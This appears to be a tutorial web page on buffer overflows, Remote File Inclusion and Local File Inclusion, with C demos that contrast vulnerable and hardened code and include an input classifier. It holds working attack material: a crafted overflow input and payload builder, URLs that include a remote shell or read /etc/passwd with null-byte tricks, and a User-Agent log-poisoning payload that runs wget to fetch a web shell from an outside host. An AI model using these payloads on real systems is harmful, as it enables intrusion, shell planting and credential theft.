Here comes the real part. A buffer overflow is the vulnerability that occurs when a program writes more data into a buffer than the buffer can hold, so the excess spills into adjacent memory and overwrites whatever was stored there.
The extra data can carry attacker-controlled values or code that triggers a malicious action. Through a buffer overflow an attacker can gain partial or full control over the victim's machine, plant backdoors on it for later access, and use the system as a bot. It is one of the deadliest classes of attack. Exploitation differs between stack-based and heap-based overflows; the demo below corrupts data on the stack.
Buffer overflow demo (thanks to Passwdatt)
/*
This program is a good example of a buffer overflow attack that corrupts data (the password) without modifying the address of the variable that stores it.
The program accepts a user name as input and loads the stored encrypted password into a buffer. When the user enters a password that is longer than 8 characters, it overwrites the system password, creating a window of opportunity for an attacker to break into the system.
The valid usernames and passwords can be found in the init_list function.
The program uses a Caesar cipher with a shift of 3.
For example a,b,c become d,e,f and so on, and x,y,z wrap around to a,b,c.

Note: the listing as extracted had lost its #includes, the struct definition, the main()
header and the password-reading loop. Those parts are reconstructed below (marked
"reconstructed") so the program compiles and behaves as the description says.
With that reconstruction the attack is: type 8 arbitrary letters, one filler byte, then the
Caesar-3 form of those 8 letters. For user joe, "aaaaaaaaXdddddddd" is accepted without
knowing "ilovemsu", because the tail of the input lands on sys_enc_pass.
*/
#include <stdio.h>
#include <string.h>

/* gets() was removed from the C11 headers; it is declared here explicitly
   because the demo deliberately keeps this unbounded read. */
char *gets(char *s);

// defines how long the username/password should be. For a unix system, the length is 8.
#define MAXLENGTH 8
// increase this if more users are added to this system.
#define LISTLENGTH 5

/* Structure used to store the list of user names
and their corresponding passwords. More names can be added by increasing the array length.
(reconstructed from its use in init_list and get_indx) */
struct usrlst {
    char *unames[LISTLENGTH];
    char *passwd[LISTLENGTH];
};

void init_list(struct usrlst *u);
int get_indx(char *pch, struct usrlst *u);
void encode_passwd(const char *, char *);

int main(void){
    struct usrlst usr;
    int pass_indx = -1, i, ch_tmp;
    // keep the length of the string one greater than MAXLENGTH to accommodate the '\0' character at the end.
    // The four buffers are adjacent in memory: writing past the end of one runs straight into the next.
    char buffer[4][MAXLENGTH+1];
    char *usrname, *usrpasswd, *sys_enc_pass, *usr_enc_pass;
    usrname = buffer[0];
    usrpasswd = buffer[1];
    sys_enc_pass = buffer[2];
    usr_enc_pass = buffer[3];
    //printf("<%p>,<%p>,<%p>,<%p>\n",&usrname[0],&usrpasswd[0],&sys_enc_pass[0],&usr_enc_pass[0]);
    printf("Password table is shown as below:\n");
    printf("Username \t\t Password \t Encrypted Password\n");
    printf(" joe \t\t\t ilovemsu \t\t loryhpvx\n");
    printf(" bob \t\t\t manitoba \t\t pdqlwred\n");
    printf(" john \t\t\t inbombay \t\t lqerpedb\n");
    printf(" marc \t\t\t hiobiwan \t\t klrelzdq\n");
    printf(" alice \t\t cometous \t\t frphwrxv\n");
    init_list(&usr);
    printf("Please enter your username (lowercase): ");
    gets(usrname);          // unbounded read into a 9-byte buffer
    if(strlen(usrname)>0)
        pass_indx = get_indx(usrname, &usr);
    else
        printf("You entered an invalid username.\nPlease try again.\nGoodbye!!\n");
    if(pass_indx >= 0){
        strcpy( sys_enc_pass, usr.passwd[pass_indx] );
        //printf("The sys passwd is: %s\n",sys_enc_pass);
        printf("Please enter the password for user %s: ", usrname);
        /* reconstructed: read the password one character at a time, echoing '*'.
           There is no bound check, so a password longer than MAXLENGTH
           overwrites sys_enc_pass in the next buffer. */
        i = 0;
        ch_tmp = '\0';
        while((ch_tmp = getchar()) != '\n' && ch_tmp != EOF){
            usrpasswd[i] = (char)ch_tmp;
            //putchar(ch_tmp); //uncomment this if you want to echo the password on the screen
            putchar('*'); //comment this if you want to see the password instead of *
            i++;
        }
        usrpasswd[i] = '\0';
        putchar('\n');
        //printf("The password you entered is: %s\n", usrpasswd);
        encode_passwd(usrpasswd, usr_enc_pass);
        printf("<%s>,<%s>,<%s>,<%s>\n",usrname,usrpasswd,sys_enc_pass,usr_enc_pass);
        if( !strcmp( usr_enc_pass, sys_enc_pass ) ){
            printf("Thank you, your password has been accepted.\nWelcome!!\n");
        } else{
            printf("Sorry, your password was not accepted.\nPlease try again.\nGoodbye!!\n");
        }
    }
    return 0;
}

/*
Encrypt the user entered password and return the Caesar cipher back.
The substitution simply replaces a letter with the letter three places down the alphabet.
Also note that the replacement letters wrap around, e.g. z->c.
Only the first MAXLENGTH characters are encoded (reconstructed; this bound is what
lets the overwritten sys_enc_pass be matched by the tail of a long input).
*/
void encode_passwd(const char* s, char *r){
    int i, ch;
    for(i=0; i<MAXLENGTH && s[i]!='\0'; i++){
        ch = s[i];
        if(ch >= 'a' && ch <= 'z')
            ch = 'a' + (ch - 'a' + 3) % 26;
        r[i] = (char)ch;
    }
    r[i] = '\0';
}

/*
Check if the username exists in the database.
If it does, get the index of its corresponding password.
Return -1 if the username is not found.
*/
int get_indx(char *pch, struct usrlst *u){
    int i;
    for (i=0; i<LISTLENGTH; i++){
        if(!strcmp(pch, u->unames[i]))
            return i;
    }
    printf("The username %s not found in database.\nPlease try again.\nGoodbye!!\n", pch);
    return -1;
}

/*
Store all the usernames and passwords in the usrlst structure.
*/
void init_list(struct usrlst *u){
    u->unames[0]="joe";   u->passwd[0]="loryhpvx"; //ilovemsu
    u->unames[1]="bob";   u->passwd[1]="pdqlwred"; //manitoba
    u->unames[2]="john";  u->passwd[2]="lqerpedb"; //inbombay
    u->unames[3]="marc";  u->passwd[3]="klrelzdq"; //hiobiwan
    u->unames[4]="alice"; u->passwd[4]="frphwrxv"; //cometous
}
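The following program is an added example, not part of the original demo, that isolates the mechanism above (adjacent fixed-size slots, an unbounded read, and a comparison against the slot that got overwritten) and puts it beside a bounded read that refuses over-long input. The arena layout, the function names, and the attacker payload builder are assumptions of this example; the Caesar-3 cipher and the user "joe"/"loryhpvx" are taken from the demo.

```c
#include <stdio.h>
#include <string.h>

#define MAXLENGTH 8
#define SLOT (MAXLENGTH + 1)          /* 8 characters plus the terminator */

/* One flat arena standing in for the demo's buffer[4][MAXLENGTH+1] (assumed layout):
   slot 0 = username, 1 = typed password, 2 = stored encrypted password,
   3 = encrypted copy of the typed password. A single array keeps the
   out-of-slot writes inside one object, so the demo itself is well defined. */
struct login_mem { char m[4 * SLOT]; };

/* Caesar shift of 3 over the first MAXLENGTH characters (the demo's cipher). */
static void caesar3(const char *s, char *r) {
    int i;
    for (i = 0; i < MAXLENGTH && s[i] != '\0'; i++)
        r[i] = (char)((s[i] >= 'a' && s[i] <= 'z') ? 'a' + (s[i] - 'a' + 3) % 26 : s[i]);
    r[i] = '\0';
}

/* Vulnerable read: like the demo's getchar() loop it does not know where its
   slot ends; the only stop is the end of the whole arena. */
static void read_unbounded(char *dst, const char *input, const char *arena_end) {
    size_t i = 0;
    while (input[i] != '\0' && dst + i < arena_end - 1) { dst[i] = input[i]; i++; }
    dst[i] = '\0';
}

/* Hardened read: refuses anything that would not fit in the slot with its
   terminator, instead of truncating silently. Returns 1 on success. */
static int read_bounded(char *dst, size_t cap, const char *input) {
    size_t n = strlen(input);
    if (n >= cap) { dst[0] = '\0'; return 0; }
    memcpy(dst, input, n + 1);
    return 1;
}

/* Runs the demo's check: stored_enc is the Caesar-3 form of the real
   password. Returns 1 if the login is accepted. */
int try_login(const char *stored_enc, const char *typed, int hardened) {
    struct login_mem lm;
    char *usrpasswd = lm.m + 1 * SLOT;
    char *sys_enc   = lm.m + 2 * SLOT;
    char *usr_enc   = lm.m + 3 * SLOT;
    memset(&lm, 0, sizeof lm);
    strcpy(sys_enc, stored_enc);                 /* 8 chars + NUL fits the slot */
    if (hardened) {
        if (!read_bounded(usrpasswd, SLOT, typed)) return 0;
    } else {
        read_unbounded(usrpasswd, typed, lm.m + sizeof lm.m);  /* may run into sys_enc */
    }
    caesar3(usrpasswd, usr_enc);
    return strcmp(usr_enc, sys_enc) == 0;
}

/* Attacker input for the vulnerable build: 8 arbitrary letters fill the
   password slot, one filler byte lands where its terminator should be, and
   the Caesar-3 form of those 8 letters lands exactly on sys_enc. first8 must
   be 8 lowercase letters; out needs 2*MAXLENGTH+2 bytes. */
void craft_payload(char *out, const char *first8) {
    char enc[SLOT];
    memcpy(out, first8, MAXLENGTH);
    out[MAXLENGTH] = 'X';
    caesar3(first8, enc);
    memcpy(out + MAXLENGTH + 1, enc, MAXLENGTH);
    out[2 * MAXLENGTH + 1] = '\0';
}

/* Wrappers against the demo's user "joe" (stored "loryhpvx", password "ilovemsu"). */
int demo_legit(int hardened) { return try_login("loryhpvx", "ilovemsu", hardened); }
int demo_wrong(int hardened) { return try_login("loryhpvx", "wrongpwd", hardened); }
int demo_attack(int hardened) {
    char payload[2 * MAXLENGTH + 2];
    craft_payload(payload, "aaaaaaaa");          /* yields "aaaaaaaaXdddddddd" */
    return try_login("loryhpvx", payload, hardened);
}

int main(void) {
    printf("vulnerable: legit=%d wrong=%d attack=%d\n", demo_legit(0), demo_wrong(0), demo_attack(0));
    printf("hardened:   legit=%d wrong=%d attack=%d\n", demo_legit(1), demo_wrong(1), demo_attack(1));
    return 0;
}
```

The point to take from the two reads is that the fix is not a bigger buffer but a read that knows the buffer's capacity and fails closed; with the bounded read the same 17-byte payload is rejected before the cipher ever runs.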
RFI
It is not only input validation attacks that can damage a server; RFI can do it with the same ease. Remote File Inclusion is a vulnerability that lets an attacker make the server include, and therefore execute, a file hosted somewhere else, usually through an include parameter that is passed straight to include() or require(). It is easier to exploit than SQL injection. In PHP it only works when allow_url_include is On, which has been off by default since PHP 5.2. After
uploading a shell this way an attacker can root the server, deface the websites hosted on it, steal website source code, and so on.
Demo of RFI
http://vulnerablesite.com/index.php?page=http://evilsite.com/shell.php
If the content served by evilsite.com shows up inside the current page, the server fetched and included the remote file and the website is vulnerable.
Things Needed:
• Shell
• A webhost which will host your shell
• If the application automatically appends an extension to the file name, end the value with a null byte, %00 (without quotes), so that everything appended after it is cut off. This only works on PHP older than 5.3.4, which stopped accepting embedded null bytes in file paths.
http://vulnerablesite.com/index.php?
What an attacker gains from a working RFI:
• Remote code execution on the web server
• Code execution on the client side
• Document hijacking, including the database it is stored on
• Source code theft
• DDoS
LFI
LFI, or Local File Inclusion, is the opposite of RFI: files already on the server are included rather than remote ones. With LFI an attacker can read, and in some cases execute, local files on the server.
After successfully exploiting an LFI vulnerability an attacker can often escalate to remote code execution on the machine.
On a Unix-based server the attacker can get hold of important files such as /etc/passwd, /etc/shadow, /etc/release, /proc/self/environ etc.
Some of the important files an attacker can get on a Windows-based machine:
\boot.ini, \php.ini, \Program Files\Apache Software Foundation\Apache\conf\logs\access.log, \Program Files\Apache Software Foundation\Apache\conf\logs\error.log etc.
A vulnerable URL looks like this:
http://www.vulnerablesite.com/index.php?page=../../../../../etc/passwd
or, if the application appends a file extension automatically, with a null byte (PHP older than 5.3.4 only):
http://www.vulnerablesite.com/index.php?page=../../../../../etc/passwd%00
(/etc/passwd lists the system accounts and usernames; the password hashes live in /etc/shadow, which is normally readable only by root, so the LFI has to run with enough privilege to read it.)
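The following program is an added example, not from the original page, written in C because that is where the %00 trick used in both the RFI and LFI URLs above actually took effect: PHP strings carry a length, but before 5.3.4 the path was handed to C functions that stop at the first NUL byte. It models that naive resolver, puts a strict allow-list resolver beside it, and adds a small classifier a log reviewer could run over page= values. The page names home/about/contact, the function names and the buffer sizes are assumptions of this example.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>

/* Pages this (hypothetical) application is allowed to include. */
static const char *const ALLOWED_PAGES[] = { "home", "about", "contact" };
enum { ATK_REMOTE = 1, ATK_TRAVERSAL = 2, ATK_NULBYTE = 4 };

static int hexval(int c) {
    if (c >= '0' && c <= '9') return c - '0';
    c = tolower(c);
    return (c >= 'a' && c <= 'f') ? c - 'a' + 10 : -1;
}

/* Percent-decodes raw into out. Returns the decoded length or -1 on a bad
   %xx or overflow. The result is a byte string, NOT a C string: %00 becomes a
   real 0x00 byte inside it, exactly as it does in a PHP string. */
int url_decode(const char *raw, unsigned char *out, size_t cap) {
    size_t n = 0;
    for (size_t i = 0; raw[i] != '\0'; i++) {
        int b = (unsigned char)raw[i];
        if (raw[i] == '%') {
            int h = hexval((unsigned char)raw[i + 1]);
            int l = (h < 0) ? -1 : hexval((unsigned char)raw[i + 2]);
            if (h < 0 || l < 0) return -1;
            b = h * 16 + l;
            i += 2;
        }
        if (n >= cap) return -1;
        out[n++] = (unsigned char)b;
    }
    return (int)n;
}

/* Model of include($_GET['page'] . ".php") before PHP 5.3.4: the script's
   length-aware string really holds "...passwd\0.php", but the path is then
   handed to a C API that stops at the first NUL. Returns (in a static buffer)
   the path the open() would actually see, or NULL on malformed input. */
const char *naive_resolve(const char *raw) {
    static char opened[320];
    unsigned char full[300];
    int n = url_decode(raw, full, sizeof full - 5);
    if (n < 0) return NULL;
    memcpy(full + n, ".php", 5);              /* length-aware concat keeps the NUL */
    strcpy(opened, (const char *)full);       /* C-string consumer: truncates at NUL */
    return opened;
}

/* Hardened resolver: decode, then accept only an exact allow-list match.
   Raw NULs, slashes, '..' and URL schemes can never reach the filesystem.
   Returns "name.php" in a static buffer, or NULL if rejected. */
const char *resolve_page(const char *raw) {
    static char safe[64];
    unsigned char dec[256];
    int n = url_decode(raw, dec, sizeof dec);
    if (n <= 0) return NULL;
    for (int i = 0; i < n; i++)
        if (!islower(dec[i])) return NULL;      /* only [a-z]: kills NUL, '/', ':', '.' */
    for (size_t k = 0; k < sizeof ALLOWED_PAGES / sizeof ALLOWED_PAGES[0]; k++) {
        const char *p = ALLOWED_PAGES[k];
        if (strlen(p) == (size_t)n && memcmp(p, dec, (size_t)n) == 0) {
            snprintf(safe, sizeof safe, "%s.php", p);
            return safe;
        }
    }
    return NULL;
}

/* Detection side: classify a raw page= value. Returns a bitmask of ATK_*
   flags (0 = looks benign, -1 = malformed encoding). */
int attack_kind(const char *raw) {
    unsigned char dec[256];
    int n = url_decode(raw, dec, sizeof dec), kind = 0;
    if (n < 0) return -1;
    for (int i = 0; i < n; i++) {
        if (dec[i] == 0) kind |= ATK_NULBYTE;
        if (i + 1 < n && dec[i] == '.' && dec[i + 1] == '.') kind |= ATK_TRAVERSAL;
        if (i + 2 < n && dec[i] == ':' && dec[i + 1] == '/' && dec[i + 2] == '/') kind |= ATK_REMOTE;
    }
    return kind;
}

int main(void) {
    /* constructed sample values, the same shapes as the URLs in the text */
    const char *samples[] = { "home", "../../../../../etc/passwd%00", "http://evilsite.com/shell.php" };
    for (size_t i = 0; i < 3; i++) {
        const char *naive = naive_resolve(samples[i]), *safe = resolve_page(samples[i]);
        printf("%-32s naive->%-30s safe->%-10s flags=%d\n", samples[i],
               naive ? naive : "(bad)", safe ? safe : "(rejected)", attack_kind(samples[i]));
    }
    return 0;
}
```

The classifier decodes before matching, so `..%2F..%2F` is caught just like a literal `../../`; a filter that only looks at the raw query string misses the encoded form, and one that only strips `../` from the decoded string misses the remote-include and null-byte variants.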
After finding a vulnerable site an attacker can execute code on the machine by changing the browser's User-Agent header; a User Agent Changer extension with a simple GUI makes this easy. The User-Agent value is written into the web server's access log and, for the request being handled, into /proc/self/environ as HTTP_USER_AGENT. Including one of those files through the LFI makes PHP parse whatever was placed in the header, so the attacker sets the User-Agent to the code he wants executed. In the example below the attacker uses:
<?exec('wget http://www.shellsite.tld/shell.txt -O shell.php');?>
When the poisoned file is included, this downloads shell.txt from the attacker's host and saves it directly as shell.php in the working directory of the web server process (normally the script's directory), where it can then be requested like any other page. The short <? tag only works if short_open_tag is enabled; <?php is parsed regardless.